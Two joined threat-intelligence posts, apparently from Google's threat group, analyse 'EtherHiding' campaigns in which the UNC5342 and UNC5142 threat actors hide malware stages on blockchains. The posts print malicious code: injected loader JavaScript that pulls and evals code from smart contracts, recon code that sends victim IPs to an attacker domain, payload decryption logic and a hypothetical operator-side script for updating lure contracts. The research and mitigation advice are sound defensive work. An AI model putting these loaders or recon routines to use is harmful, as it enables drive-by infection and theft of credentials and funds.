Figure 2 is an example of an API call to read data stored in the smart contract from the transaction history. The transaction details show that the contract has been updated over 20 times within the first four months, with each update costing an average of $1.37 USD in gas fees. The low cost and frequency of these updates illustrate the attacker’s ability to easily change the campaign’s configuration. This smart contract has also been linked to a software supply chain attack that impacted React Native Aria and GlueStack via compromised npm packages in June 2025.
Blockchain explorers like BscScan (for BNB Smart Chain) and Etherscan (for Ethereum) are essential tools for reviewing on-chain information like smart contract code and historic transactions to and from the contract. These transactions may include input data such as a variable Name, its Type, and the Data stored in that variable. Figure 3 shows on-chain activity at the transaction address 0x5c77567fcf00c317b8156df8e00838105f16fdd4fbbc6cd83d624225397d8856, where the Data field contains a Base64-encoded and XOR-encrypted message. This message decrypts to a heavily obfuscated JavaScript payload that GTIG assesses as the second-stage downloader, JADESNOW.
Figure 3: UNC5342 on-chain activity
When comparing transactions, the launcher-related code remains intact, but the next stage payload is frequently updated with a new obfuscated payload. In this case, the obfuscated payload is run in memory and decrypts an array of strings that combine to form API calls to different transaction hashes on Ethereum. This pivot to a different network is notable. The attackers are not using an Ethereum smart contract to store the payload; instead, they perform a GET request to query the transaction history of their attacker-controlled address and read the calldata stored from transactions made to the well-known “burn” address 0x00…dEaD.
Figure 4: On-chain transactions
The final address of these transactions is inconsequential since the malware only reads the data stored in the details of a transaction, effectively using the blockchain transaction as a Dead Drop Resolver. These transactions are generated frequently, showing how easily the campaign can be updated with a simple blockchain transaction, including changing the C2 server.
The in-memory payload fetches and evaluates the information stored on-chain by querying Ethereum via different blockchain explorer APIs. Multiple explorers are queried simultaneously (including Blockchair, Blockcypher, and Ethplorer), likely as a fail-safe way to ensure payload retrieval. The use of a free API key, such as apiKey=freekey offered by Ethplorer for development, is sufficient for the JADESNOW operation despite strict usage limits.
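Defenders reviewing this activity can pull the same on-chain data directly. The web3.js sketch below fetches a transaction’s calldata from an Ethereum JSON-RPC endpoint and dumps it for inspection; the endpoint URL and transaction hash are placeholders to be replaced with a provider of your choice and a transaction of interest.

// Analyst sketch: fetch a transaction's calldata for offline inspection.
// The RPC endpoint and transaction hash below are placeholders.
const { Web3 } = require('web3');                            // assumes web3.js v4+
const web3 = new Web3('https://ethereum-rpc.example.com');   // substitute any public Ethereum RPC URL

async function dumpCalldata(txHash) {
  const tx = await web3.eth.getTransaction(txHash);          // read-only lookup, no gas required
  if (!tx) throw new Error('transaction not found');
  const bytes = Buffer.from(tx.input.slice(2), 'hex');       // strip "0x" and convert calldata to raw bytes
  console.log('Calldata length:', bytes.length, 'bytes');
  console.log(bytes.toString('utf8'));                       // often another encoded layer, e.g. Base64 + XOR
}

dumpCalldata('0x0000000000000000000000000000000000000000000000000000000000000000')
  .catch(console.error);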
Payload Analysis
The third stage is the INVISIBLEFERRET.JAVASCRIPT payload stored at the Ethereum transaction address 0x86d1a21fd151e344ccc0778fd018c281db9d40b6ccd4bdd3588cb40fade1a33a. This payload connects to the C2 server via port 3306, the default port for MySQL. It sends an initial beacon with the victim’s hostname, username, operating system, and the directory the backdoor is currently running under. The backdoor proceeds to run in the background, listening for incoming commands to the C2. The command handler is capable of processing arbitrary command execution, executing built-in commands to change the directory, and exfiltrating files, directories, and subdirectories from the victim’s system.
The INVISIBLEFERRET.JAVASCRIPT payload may also be split into different components, as is done at the transaction address 0xc2da361c40279a4f2f84448791377652f2bf41f06d18f19941a96c720228cd0f. The split JavaScript payload executes the INVISIBLEFERRET.JAVASCRIPT backdoor and attempts to install a portable Python interpreter to execute an additional credential stealer component stored at the transaction address 0xf9d432745ea15dbc00ff319417af3763f72fcf8a4debedbfceeef4246847ce41. This additional credential stealer component targets web browsers like Google Chrome and Microsoft Edge to exfiltrate stored passwords, session cookies, and credit cards. The INVISIBLEFERRET.JAVASCRIPT credential stealer component also targets cryptocurrency wallets like MetaMask and Phantom, as well as credentials from other sensitive applications like password managers (e.g., 1Password). The data is compressed into a ZIP archive and uploaded to an attacker-controlled remote server and a private Telegram chat.
The Centralized Dependencies in EtherHiding
Decentralization is a core tenet of blockchain networks and other Web3 technologies. In practice, however, centralized services are often used, which introduces both opportunities and risks. Though blockchains like BNB Smart Chain are immutable and permissionless and the smart contracts deployed onto such blockchains cannot be removed, operations by threat actors using these blockchains are not unstoppable.
Neither North Korea’s UNC5342 nor threat actor UNC5142 are interacting directly with BNB Smart Chain when retrieving information from smart contracts; both threat actors are utilizing centralized services, akin to using traditional Web2 services such as web hosting. This affords astute defenders the opportunity to mitigate such threats. These centralized intermediaries represent points of observation and control, where traffic can be monitored and malicious activity can be addressed through blocking, account suspensions, or other methods. In other words, UNC5142 and UNC5342 are using permissioned services to interact with permissionless blockchains.
These threat actors exhibit two different approaches to utilizing centralized services for interfacing with blockchain networks:
An RPC endpoint is used by UNC5142 (CLEARFAKE) in the EtherHiding activity. This allows direct communication with a BNB Smart Chain node hosted by a third party in a manner that is close to a blockchain node’s “native tongue.”
An API service hosted by a central entity is used by UNC5342 (DPRK), acting as a layer of abstraction between the threat actor and the blockchain.
Though the difference is nuanced, these intermediary services are positioned to directly impact threat actor operations. Another approach not observed in these operations is to operate a node that integrates fully with the blockchain network. Running a full node is resource-intensive, slow to sync, and creates a significant hardware and network footprint that can be traced, making it a cumbersome and risky tool for cyber operations.
Recommendations
EtherHiding presents new challenges as traditional campaigns have usually been halted by blocking known domains and IPs. Malware authors may leverage the blockchain to perform further malware propagation stages since smart contracts operate autonomously and cannot be shut down.
Figure 5: BscScan warning message
While security researchers attempt to warn the community by tagging a contract as malicious on official blockchain scanners (like the warning on BscScan in Figure 5), malicious activity can still be performed.
Chrome Enterprise: Centralized Mitigation
Chrome Enterprise can be a powerful tool for mitigating the impact of EtherHiding by using its centralized management capabilities to enforce policies that directly disrupt the attack chain. This approach shifts security away from relying on individual user discretion and into the hands of a centralized, automated system.
The core strength of Chrome Enterprise resides in Chrome Browser Cloud Management. This platform allows administrators to configure and enforce security policies across all managed browsers in their organization, ensuring consistent protection regardless of the user’s location or device.
For EtherHiding, this means an administrator can deploy a defense strategy that does not rely on individual users making the right security decisions.
Key Prevention Policies and Strategies
An administrator can use specific policies to break the EtherHiding attack at multiple points:
1. Block Malicious Downloads
This is the most direct and effective way to stop the attack. The final step of an EtherHiding campaign requires the user to download and run a malicious file (e.g., from a fake update prompt). Chrome Enterprise can prevent this entirely.
DownloadRestrictions Policy: An admin can configure this policy to block downloads of dangerous file types. By setting this policy to block file types like .exe, .msi, .bat, and .dll, the malicious payload cannot be saved to the user’s computer, effectively stopping the attack.
2. Automate and Manage Browser Updates
EtherHiding heavily relies on social engineering, most notably by using a pop-up that tells the user “Your Chrome is out of date.” In a managed enterprise environment, this should be an immediate red flag.
Managed Updates: Administrators use Chrome Enterprise to control and automate browser updates. Updates are pushed silently and automatically in the background.
User Training: Because updates are managed, employees can be trained with a simple, powerful message: “You will never be asked to manually update Chrome.” Any prompt to do so can be treated as a scam, which undermines the campaign’s primary social engineering tactic.
3. Control Web Access and Scripts
While attackers constantly change their infrastructure, policies can still reduce the initial attack surface.
URLBlocklist Policy: Admins can block access to known malicious websites, domains, or even the URLs of blockchain nodes if they are identified by threat intelligence.
Safe Browsing: Policies can enforce Google’s Safe Browsing in its most enhanced mode, which uses real-time threat intelligence to warn users about phishing sites and malicious downloads.
Acknowledgements
This analysis would not have been possible without the assistance from across Google Threat Intelligence Group, including the Koreas Mission, FLARE, and Advanced Practices.
Written by: Mark Magee, Jose Hernandez, Bavi Sadayappan, Jessa Valdez
Since late 2023, Mandiant Threat Defense and Google Threat Intelligence Group (GTIG) have tracked UNC5142, a financially motivated threat actor that abuses the blockchain to facilitate the distribution of information stealers (infostealers). UNC5142 is characterized by its use of compromised WordPress websites and “EtherHiding”, a technique used to obscure malicious code or data by placing it on a public blockchain, such as the BNB Smart Chain. This post is part of a two-part blog series on adversaries using the EtherHiding technique. Read our other post on North Korea (DPRK) adopting EtherHiding.
Since late 2023, UNC5142 has significantly evolved their tactics, techniques, and procedures (TTPs) to enhance operational security and evade detection. Notably, we have not observed UNC5142 activity since late July 2025, suggesting a shift in the actor’s operational methods or a pause in their activity.
UNC5142 appears to indiscriminately target vulnerable WordPress sites, leading to widespread and opportunistic campaigns that impact a range of industries and geographic regions. As of June 2025, GTIG had identified approximately 14,000 web pages containing injected JavaScript consistent with an UNC5142-compromised website. We have seen UNC5142 campaigns distribute infostealers including ATOMIC, VIDAR, LUMMAC.V2, and RADTHIEF. GTIG does not currently attribute these final payloads to UNC5142, as it is possible these payloads are distributed on behalf of other threat actors. This post will detail the full UNC5142 infection chain, analyze its novel use of smart contracts for operational infrastructure, and chart the evolution of its TTPs based on direct observations from Mandiant Threat Defense incidents.
UNC5142 Attack Overview
An UNC5142 infection chain typically involves the following key components or techniques:
CLEARSHORT: A multistage JavaScript downloader to facilitate the distribution of payloads
Compromised WordPress Websites: Websites running vulnerable versions of WordPress, or using vulnerable plugins/themes
Smart Contracts: Self-executing contracts stored on the BNB Smart Chain (BSC) blockchain
EtherHiding: A technique used to obscure malicious code or data by placing it on a public blockchain. UNC5142 relies heavily on the BNB Smart Chain to store its malicious components in smart contracts, making them harder for traditional website security tools to detect and block
Figure 1: CLEARSHORT infection chain
CLEARSHORT
CLEARSHORT is a multistage JavaScript downloader used to facilitate malware distribution. The first stage consists of a JavaScript payload injected into vulnerable websites, designed to retrieve the second-stage payload from a malicious smart contract. The smart contract is responsible for fetching the next stage, a CLEARSHORT landing page, from an external attacker-controlled server. The CLEARSHORT landing page leverages ClickFix, a popular social engineering technique aimed at luring victims to locally run a malicious command using the Windows Run dialog box.
CLEARSHORT is an evolution of the CLEARFAKE downloader, which UNC5142 previously leveraged in their operations from late 2023 through mid-2024. CLEARFAKE is a malicious JavaScript framework that masquerades as a Google Chrome browser update notification. The primary function of the embedded JavaScript is to download a payload after the user clicks the “Update Chrome” button. The second-stage payload is a Base64-encoded JavaScript code stored in a smart contract deployed on the BNB Smart Chain.
Compromised WordPress Sites
The attack begins with the compromise of a vulnerable WordPress website, which is exploited to gain unauthorized access. UNC5142 injects malicious JavaScript (CLEARSHORT stage 1) code into one of three locations:
Plugin directories: Modifying existing plugin files or adding new malicious files
Theme files: Modifying theme files (like header.php, footer.php, or index.php) to include the malicious script
Database: In some cases, the malicious code is injected directly into the WordPress database
What is a Smart Contract?
Smart contracts are programs stored on a blockchain, like the BNB Smart Chain (BSC), that run automatically when a specified trigger occurs. While these triggers can be complex, CLEARSHORT uses a simpler method by calling a function that tells the contract to execute and return a pre-stored piece of data.
Smart contracts provide several advantages for threat actors to use in their operations, including:
Obfuscation: Storing malicious code within a smart contract makes it harder to detect with traditional web security tools that might scan website content directly.
Mutability (and Agility): While smart contracts themselves are immutable, the attackers use a clever technique. They deploy a first-level smart contract that contains a pointer to a second-level smart contract. The first-level contract acts as a stable entry point whose address never changes on the compromised website, directing the injected JavaScript to fetch code from a second-level contract, giving the attackers the ability to change this target without altering the compromised website.
Resilience: The use of blockchain technology for large parts of UNC5142’s infrastructure and operation increases their resiliency in the face of detection and takedown efforts. Network-based protection mechanisms are more difficult to implement for Web3 traffic than for traditional web traffic, given the lack of traditional URLs. Seizure and takedown operations are also hindered by the immutability of the blockchain. This is further discussed later in the post.
Leveraging legitimate infrastructure: The BNB Smart Chain is a legitimate platform. Using it can help the malicious traffic blend in with normal activity as a means to evade detection.
Smart Contract Interaction
CLEARSHORT stage 1 uses Web3.js, a collection of libraries that allow interaction with remote Ethereum nodes using HTTP, IPC, or WebSocket, typically connecting to the BNB Smart Chain via a public node like bsc-dataseed.binance[.]org. The stage 1 code contains instructions to interact with specific smart contract addresses, and calls functions defined in the contract’s Application Binary Interface (ABI). These functions return payloads, including URLs to the CLEARSHORT landing page. This page is decoded and executed within the browser, displaying a fake error message to the victim. The lure and template of this error message have varied over time, while maintaining the goal of luring the victim to run a malicious command via the Run dialog box. The executed command ultimately results in the download and execution of a follow-on payload, which is often an infostealer.
// Load libraries from public CDNs to interact with the blockchain and decode payloads.
<script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.js"></script>
<script>
console.log('Start moving...');
// The main malicious logic starts executing once the webpage's DOM is fully loaded.
document.addEventListener('DOMContentLoaded', async () => {
try {
// Establishes a connection to the BNB Smart Chain via a public RPC node.
const web3 = new Web3('https://bsc-dataseed.binance.org/');
// Creates an object to interact with the 1st-Level Smart Contract.
const contract = new web3.eth.Contract([
{
"inputs": [],
"stateMutability": "nonpayable",
"type": "constructor"
},
{
"inputs": [],
"name": "orchidABI", // Returns 2nd contract ABI
"outputs": [{
"internalType": "string",
"name": "",
"type": "string"
}],
"stateMutability": "view",
"type": "function"
},
{
"inputs": [],
"name": "orchidAddress",// Returns 2nd contract address
"outputs": [{
"internalType": "string",
"name": "",
"type": "string"
}],
"stateMutability": "view",
"type": "function"
},
], '0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53'); // Hardcoded address of the 1st-Level Contract.
// ABI is Base64 decoded and then decompressed to get clean ABI.
const orchidABI = JSON.parse(pako.ungzip(Uint8Array.from(atob(await contract.methods.orchidABI().call()), c => c.charCodeAt(0)), {
to: 'string'
}));
// Calls the 'orchidAddress' function to get the address of the 2nd-Level Contract.
const orchidAddress = await contract.methods.orchidAddress().call();
// New contract object created to represent 2nd-level contract.
const orchid = new web3.eth.Contract(orchidABI, orchidAddress);
const decompressedScript = pako.ungzip(Uint8Array.from(atob(await orchid.methods.tokyoSkytree().call()), c => c.charCodeAt(0)), {
to: 'string'
});
eval(`(async () => { ${decompressedScript} })().then(() => { console.log('Moved.'); }).catch(console.error);`);
} catch (error) {
console.error('Road unavaible:', error);
}
});
</script>
Figure 2: Injected code from a compromised website – CLEARSHORT stage 1
When a user visits a compromised web page, the injected JavaScript executes in the browser and initiates a set of connections to one or multiple BNB smart contracts, resulting in the retrieval and rendering of the CLEARSHORT landing page (stage 2) (Figure 3).
A key element of UNC5142’s operations is their use of the EtherHiding technique. Instead of embedding their entire attack chain within the compromised website, they store malicious components on the BNB Smart Chain, using smart contracts as a dynamic configuration and control backend. The on-chain operation is managed by one or more actor-controlled wallets. These Externally Owned Accounts (EOAs) are used to:
Deploy the smart contracts, establishing the foundation of the attack chain.
Supply the BNB needed to pay network fees for making changes to the attack infrastructure.
Update pointers and data within the contracts, such as changing the address of a subsequent contract or rotating the payload decryption keys.
Figure 4: UNC5142’s EtherHiding architecture on the BNB Smart Chain
Evolution of UNC5142 TTPs
Over the past year, Mandiant Threat Defense and GTIG have observed a consistent evolution in UNC5142’s TTPs. Beginning in late 2024, their campaigns progressed from a single-contract system to a significantly more complex three-level smart contract architecture that enables a dynamic, multi-stage approach.
This evolution is characterized by several key shifts: the adoption of a three smart contract system for dynamic payload delivery, the abuse of legitimate services like Cloudflare Pages for hosting malicious lures, and a transition from simple Base64 encoding to AES encryption. The actor has continuously refined its social engineering lures and expanded its infrastructure, at times operating parallel sets of smart contracts to increase both the scale and resilience of their campaigns.
Timeframe: May 2024
Key changes: Single smart contract system
Hosting & infrastructure: .shop TLDs for lures and C2
Lure encoding / encryption: Base64
Notable lures & payloads: Fake Chrome update lures

Timeframe: November 2024
Key changes: Introduction of the three-smart-contract system
Hosting & infrastructure: Abuse of Cloudflare *.pages.dev for lures; .shop / .icu domains for recon
Lure encoding / encryption: AES-GCM + Base64
Notable lures & payloads: STUN server for victim IP recon

Timeframe: January 2025
Key changes: Refinement of the three-contract system
Hosting & infrastructure: Continued *.pages.dev abuse
Lure encoding / encryption: AES-GCM + Base64
Notable lures & payloads: New lures (fake reCAPTCHA, Data Privacy agreements); ATOMIC (macOS), VIDAR

Timeframe: February 2025
Key changes: Secondary infrastructure deployed; payload URL stored in smart contract
Hosting & infrastructure: Expanded use of *.pages.dev and new payload domains
Lure encoding / encryption: AES-GCM + Base64
Notable lures & payloads: New Cloudflare “Unusual Web Traffic” error lure; recon check-in removed, replaced by cookie tracking

Timeframe: March 2025
Key changes: Active use of both Main and Secondary infrastructure
Hosting & infrastructure: MediaFire and GitHub for payload hosting
Lure encoding / encryption: AES-GCM + Base64
Notable lures & payloads: Staged POST check-ins to track victim interaction; RADTHIEF, LUMMAC.V2

Timeframe: May 2025
Key changes: Continued refinement of lures and payload delivery
Hosting & infrastructure: *.pages.dev for lures, various TLDs for payloads
Lure encoding / encryption: AES-GCM + Base64
Notable lures & payloads: New “Anti-Bot Verification” lure for Windows & macOS
Cloudflare Pages Abuse
In late 2024, UNC5142 shifted to the use of the Cloudflare Pages service (*.pages.dev) to host their landing pages; previously they leveraged .shop TLD domains. Cloudflare Pages is a legitimate service maintained by Cloudflare that provides a quick mechanism for standing up a website online, leveraging Cloudflare’s network to ensure it loads swiftly. These pages provide several advantages: Cloudflare is a trusted company, so these pages are less likely to be immediately blocked, and it is easy for the attackers to quickly create new pages if old ones are taken down.
The Three Smart Contract System
The most significant change is the shift from a single smart contract system to a three smart contract system. This new architecture is an adaptation of a legitimate software design principle known as the proxy pattern, which developers use to make their contracts upgradable. A stable, unchangeable proxy forwards calls to a separate second-level contract that can be replaced to fix bugs or add features.
This setup functions as a highly efficient Router-Logic-Storage architecture where each contract has a specific job. This design allows for rapid updates to critical parts of the attack, such as the landing page URL or decryption key, without any need to modify the JavaScript on compromised websites. As a result, the campaigns are much more agile and resistant to takedowns.
1) Initial call to the First-Level contract: The infection begins when the injected JavaScript on a compromised website makes an eth_call to the First-Level Smart Contract (e.g., 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53). The primary function of this contract is to act as a router. Its job is to provide the address and Application Binary Interface (ABI) for the next stage, ensuring attackers rarely need to update the script across their vast network of compromised websites. The ABI data is returned in a compressed, Base64-encoded format, which the script decodes via atob() and then decompresses using pako.ungzip to obtain the clean interface data.
2) Victim fingerprinting via the Second-Level contract: The injected JavaScript connects to the Second-Level Smart Contract (e.g., 0x8FBA1667BEF5EdA433928b220886A830488549BD). This contract acts as the logic of the attack, containing code to perform reconnaissance actions (Figure 5 and Figure 6). It makes a series of eth_call operations to execute specific functions within the contract to fingerprint the victim’s environment:
teaCeremony (0x9f7a7126), initially served as a method for dynamic code execution and page display. Later it was used for adding and removing POST check-ins.
shibuyaCrossing (0x1ba79aa2), responsible for identifying the victim’s platform or operating system with additional OS/platform values added over time
asakusaTemple (0xa76e7648), initially a placeholder for console log display that later evolved into a beacon for tracking user interaction stages by sending user-agent values
ginzaLuxury (0xa98b06d3), responsible for retrieving the code for finding, fetching, decrypting, and ultimately displaying the malicious lure to the user
The functionality for command and control (C2) check-ins has evolved within the contract:
Late 2024: The script used a STUN server (stun:stun.l.google.com:19302) to obtain the victim’s public IP and sent it to a domain such as saaadnesss[.]shop/check or lapkimeow[.]icu/check.
February 2025: The STUN-based POST check-in was removed and replaced with a cookie-based tracking mechanism (data-ai-collecting) within the teaCeremony (0x9f7a7126) function.
April 2025: The check-in mechanism was reintroduced and enhanced. The asakusaTemple (0xa76e7648) function was modified to send staged POST requests to the domain ratatui[.]today, beaconing at each phase of the lure interaction to track victim progression.
Figure 5: Example of second-level smart contract transaction contents
//Example of code retrieved from the second-level smart contract (IP check and STUN)
if (await new Promise(r => {
let a = new RTCPeerConnection({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
a.createDataChannel("");
a.onicecandidate = e => {
let ip = e?.candidate?.candidate?.match(/\d+\.\d+\.\d+\.\d+/)?.[0];
if (ip) {
fetch('https://saaadnesss[.]shop/check', { // Or lapkimeow[.]icu/check
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ ip, domain: location.hostname })
}).then(r => r.json()).then(data => r(data.status));
a.onicecandidate = null;
}
};
a.createOffer().then(o => a.setLocalDescription(o));
}) === "Decline") {
console.warn("Execution stopped: Declined by server");
} else {
await teaCeremony(await orchid.methods.shibuyaCrossing().call(), 2);
await teaCeremony(await orchid.methods.akihabaraLights().call(), 3);
await teaCeremony(await orchid.methods.ginzaLuxury().call(), 4);
await teaCeremony(await orchid.methods.asakusaTemple().call(), 5);
}
3) Lure & payload URL hosting in Third-Level Contract: Once the victim is fingerprinted, the logic in the Second-Level Contract queries the Third-Level Smart Contract (e.g., 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA). This final contract acts as a configuration storage container. It typically contains the URL hosting the encrypted CLEARSHORT payload, the AES key to decrypt the page, and the URL hosting the second stage payload.
Figure 7: Encrypted landing page URL
Figure 8: Payload URL
By separating the static logic (second-level) from the dynamic configuration (third-level), UNC5142 can rapidly rotate domains, update lures, and change decryption keys with a single, cheap transaction to their third-level contract, ensuring their campaign remains effective against takedowns.
How an Immutable Contract Can Be ‘Updated’
A key question that arises is how attackers can update something that is, by definition, unchangeable. The answer lies in the distinction between a smart contract’s code and its data.
Immutable code: Once a smart contract is deployed, its program code is permanent and can never be altered. This is the part that provides trust and reliability.
Mutable data (state): However, a contract can also store data, much like a program uses a database. The permanent code of the contract can include functions specifically designed to change this stored data.
UNC5142 exploits this by having their smart contracts built with special administrative functions. To change a payload URL, the actor uses their controlling wallet to send a transaction that calls one of these functions, feeding it the new URL. The contract’s permanent code executes, receives this new information, and overwrites the old URL in its storage.
From that point on, any malicious script that queries the contract will automatically receive the new, updated address. The contract’s program remains untouched, but its configuration is now completely different. This is how they achieve agility while operating on an immutable ledger.
An analysis of the transactions shows that a typical update, such as changing a lure URL or decryption key in the third-level contract, costs the actor between $0.25 and $1.50 USD in network fees. After the one-time cost of deploying the smart contracts, the initial funding for an operator wallet is sufficient to cover several hundred such updates. This low operational cost is a key enabler of their resilient, high-volume campaigns, allowing them to rapidly adapt to takedowns with minimal expense.
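As a hypothetical sketch (not recovered actor tooling), an update of this kind could be issued with a few lines of web3.js from the operator’s wallet. The setter name, contract address, and key handling below are assumptions for illustration only.
// Hypothetical sketch (web3.js v4) of a storage update transaction from the
// operator side. Setter name, contract address, and key handling are
// illustrative assumptions, not observed actor code.
const { Web3 } = require('web3');

const web3 = new Web3('https://bsc-dataseed.binance.org/');

// Attacker-controlled EOA; the private key is supplied out of band.
const operator = web3.eth.accounts.privateKeyToAccount(process.env.OPERATOR_KEY);
web3.eth.accounts.wallet.add(operator);

// ABI fragment for an assumed admin-only setter on the third-level contract.
const abi = [{
  inputs: [{ internalType: 'string', name: 'newUrl', type: 'string' }],
  name: 'setLureUrl', // hypothetical function name
  outputs: [],
  stateMutability: 'nonpayable',
  type: 'function'
}];

// Placeholder address standing in for the third-level (storage) contract.
const thirdLevel = new web3.eth.Contract(abi, '0x0000000000000000000000000000000000000000');

// A single cheap transaction overwrites the stored configuration; the
// contract's immutable code is untouched, only its state changes.
thirdLevel.methods
  .setLureUrl('https://example.pages.dev/new-lure')
  .send({ from: operator.address, gas: 100000 })
  .then((receipt) => console.log('Updated in tx', receipt.transactionHash))
  .catch(console.error);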
AES-Encrypted CLEARSHORT
In December 2024, UNC5142 introduced AES encryption for the CLEARSHORT landing page, shifting away from the Base64-encoded payloads used previously. Not only does this reduce the effectiveness of some detection efforts, it also makes the payload harder for security researchers to analyze. The encrypted CLEARSHORT landing page is typically hosted on a Cloudflare *.pages.dev page. The decryption function uses an AES-GCM key retrieved from the third smart contract (Figure 9 and Figure 10), with the initialization vector prepended to the encrypted data. The decryption is performed client-side within the victim’s browser.
Figure 9: AES Key within smart contract transaction
// Simplified example of the decryption logic
async function decryptScrollToText(encryptedBase64, keyBase64) {
const key = Uint8Array.from(atob(keyBase64), c => c.charCodeAt(0));
const combinedData = Uint8Array.from(atob(encryptedBase64), c => c.charCodeAt(0));
const iv = combinedData.slice(0, 12); // IV is the first 12 bytes
const encryptedData = combinedData.slice(12);
const cryptoKey = await crypto.subtle.importKey(
"raw", key, "AES-GCM", false, ["decrypt"]
);
const decryptedArrayBuffer = await crypto.subtle.decrypt(
{ name: "AES-GCM", iv },
cryptoKey,
encryptedData
);
return new TextDecoder().decode(decryptedArrayBuffer);
}
// ... (Code to fetch encrypted HTML and key from the third-level contract) ...
if (cherryBlossomHTML) { // cherryBlossomHTML contains the encrypted landing page
try {
let sakuraKey = await JadeContract.methods.pearlTower().call(); // Get the AES key
const decryptedHTML = await decryptScrollToText(cherryBlossomHTML, sakuraKey);
// ... (Display the decrypted HTML in an iframe) ...
} catch (error) {
return;
}
}
Figure 10: Simplified decryption logic
CLEARSHORT Templates and Lures
UNC5142 has used a variety of lures for their landing page, evolving them over time:
January 2025: Lures included fake Data Privacy agreements and reCaptcha turnstiles (Figure 11 and Figure 12).
Figure 11: “Disable Data Collection” CLEARSHORT lure
Figure 12: Fake reCAPTCHA lure
March 2025: The threat cluster began using a lure that mimics a Cloudflare IP web error (Figure 13).
Figure 13: Cloudflare “Unusual Web Traffic” error
May 2025: An “Anti-Bot Lure” was observed, presenting another variation of a fake verification step (Figure 14).
Figure 14: Anti-Bot Lure
On-Chain Analysis
Mandiant Threat Defense’s analysis of UNC5142’s on-chain activity on the BNB Smart Chain reveals a clear and evolving operational strategy. A timeline of their blockchain transactions shows the use of two distinct sets of smart contract infrastructures, which GTIG tracks as the Main and Secondary infrastructures. Both serve the same ultimate purpose, delivering malware via the CLEARSHORT downloader.
Leveraging BNB Smart Chain’s smart contract similarity search, a process where the compiled bytecode of smart contracts is compared to find functional commonalities, revealed that the Main and Secondary smart contracts were identical at the moment of their creation. This strongly indicates that the same threat actor, UNC5142, is responsible for all observed activity. It is highly likely that the actor cloned their successful Main infrastructure to create the foundation for Secondary, which could then be updated via subsequent transactions to deliver different payloads.
Further analysis of the funding sources shows that the primary operator wallets for both groups received funds from the same intermediary wallet (0x3b5a...32D), an account associated with the OKX cryptocurrency exchange. While attribution based solely on transactions from a high-volume exchange wallet requires caution, this financial link, combined with the identical smart contract code and mirrored deployment methodologies, makes it highly likely that a single threat actor, UNC5142, controls both infrastructures.
Parallel Distribution Infrastructures
Transaction records show key events for both groups occurring in close proximity, indicating coordinated management.
On Feb. 18, 2025, not only was the entire Secondary infrastructure created and configured, but the Main operator wallet also received additional funding on the same day. This coordinated funding activity strongly suggests a single actor preparing for and executing an expansion of their operations.
Furthermore, on March 3, 2025, transaction records show that operator wallets for both Main and Secondary infrastructures conducted payload and lure update activities. This demonstrates concurrent campaign management, where the actor was actively maintaining and running separate distribution efforts through both sets of smart contracts simultaneously.
Main
Mandiant Threat Defense analysis pinpoints the creation of the Main infrastructure to a brief, concentrated period on Nov. 24, 2024. The primary Main operator wallet (0xF5B9...71B) was initially funded on the same day with 0.1 BNB (worth approximately $66 USD at the time). Over the subsequent months, this wallet and its associated intermediary wallets received funding on multiple occasions, ensuring the actor had sufficient BNB to cover transaction fees for ongoing operations.
The transaction history for Main infrastructure shows consistent updates over the course of the first half of 2025. Following the initial setup, Mandiant observed payload and lure updates occurring on a near-monthly and at times bi-weekly basis from December 2024 through the end of May 2025. This sustained activity, characterized by frequent updates to the third-level smart contract, demonstrates its role as the primary infrastructure for UNC5142’s campaigns.
Secondary
Mandiant Threat Defense observed a significant operational expansion where the actor deployed the new, parallel Secondary infrastructure. The Secondary operator wallet (0x9AAe...fac9) was funded on Feb. 18, 2025, receiving 0.235 BNB (approximately $152 USD at the time). Shortly after, the entire three-contract system was deployed and configured. Mandiant observed that updates to Secondary infrastructure were active between late February and early March 2025. After this initial period, the frequency of updates to the Secondary smart contracts decreased substantially.
Figure 15: Timeline of UNC5142’s on-chain infrastructure
The Main infrastructure stands out as the core campaign infrastructure, marked by its early creation and steady stream of updates. The Secondary infrastructure appears as a parallel, more tactical deployment, likely established to support a specific surge in campaign activity, test new lures, or simply build operational resilience.
As of this publication, the last observed on-chain update to this infrastructure occurred on July 23, 2025, suggesting a pause in this campaign or a potential shift in the actor’s operational methods.
Final Payload Distribution
Over the past year, Mandiant Threat Defense has observed UNC5142 distribute a wide range of final payloads, including VIDAR, LUMMAC.V2, and RADTHIEF (Figure 16). Given the distribution of a variety of payloads over a range of time, it is possible that UNC5142 functions as a malware distribution threat cluster. Distribution threat clusters play a significant role within the cyber criminal threatscape, providing actors of varying levels of technical sophistication a means to distribute malware and/or gain initial access to victim environments. However, given the consistent distribution of infostealers, it’s also plausible that the threat cluster’s objective is to obtain stolen credentials to facilitate further operations, such as selling the credentials to other threat clusters. While the exact business model of UNC5142 is unclear, GTIG currently does not attribute the final payloads to the threat cluster due to the possibility it is a distribution threat cluster.
Figure 16: UNC5142 final payload distribution over time
An analysis of their infection chains since the beginning of 2025 reveals that UNC5142 follows a repeatable four-stage delivery chain after the initial CLEARSHORT lure:
The initial dropper: The first stage almost always involves the execution of a remote HTML Application (.hta) file, often disguised with a benign file extension like .xll (Excel Add-in). This component, downloaded from a malicious domain or a legitimate file-sharing service, serves as the entry point for executing code on the victim’s system outside the browser’s security sandbox.
The PowerShell loader: The initial dropper’s primary role is to download and execute a second-stage PowerShell script. This script is responsible for defense evasion and orchestrating the download of the final payload.
Abuse of legitimate services: The actor has consistently leveraged legitimate file hosting services such as GitHub and MediaFire to host encrypted data blobs, with some instances observed where final payloads were hosted on their own infrastructure. This tactic helps the malicious traffic blend in with legitimate network activity, bypassing reputation-based security filters.
In-memory execution: In early January, executables were being used to serve VIDAR, but since then, the final malware payload has transitioned to being delivered as an encrypted data blob disguised as a common file type (e.g., .mp4, .wav, .dat). The PowerShell loader contains the logic to download this blob, decrypt it in memory, and execute the final payload (often a .NET loader), without ever writing the decrypted malware to disk.
In earlier infection chains, the URL for the first-stage .hta dropper was often hardcoded directly into the CLEARSHORT lure’s command (e.g., mshta hxxps[:]//…pages.dev). The intermediate PowerShell script would then download the final malware directly from a public repository like GitHub.
January 2025
